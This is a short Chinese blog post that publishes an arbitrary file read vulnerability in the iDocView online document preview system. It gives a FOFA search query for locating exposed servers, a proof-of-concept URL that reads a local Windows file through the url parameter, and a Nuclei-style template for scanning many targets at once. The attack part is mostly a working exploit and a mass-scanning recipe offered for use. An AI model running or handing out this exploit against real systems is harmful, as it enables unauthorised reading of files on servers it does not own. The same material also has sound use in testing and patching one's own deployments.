正文

iDocview某接口存在任意文件读取

admin
admin V管理员 /0 评论 /294 阅读
0109
此篇文章发布距今已超过663天,您需要注意文章的内容或图片是否可用!

PART

01

漏洞简介

 此在线文档预览系统是一套用于在Web环境中展示和预览各种文档类型的系统,如文本文档、电子表格、演示文稿、PDF文件等。此系统某接口存在任意文件读取漏洞。 

PART

02

漏洞复现

1、使用下面fofa语句进行资产收集,确认测试目标

fofa语句title="I Doc View"

2、拼接POC进行访问

/view/url?url=file:///C:/windows/win.ini

PART

03

批量扫描

id: I-Doc-View
info:  name: I-Doc-View  author: fl  severity: high  description:   metadata:     fofa-query: title="I Doc View"
http:  - raw:      - |             GET /view/url?url=file:///C:/windows/win.ini HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
    matchers:      - type: dsl        dsl:          - 'status_code==200'


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
ZhouSa.com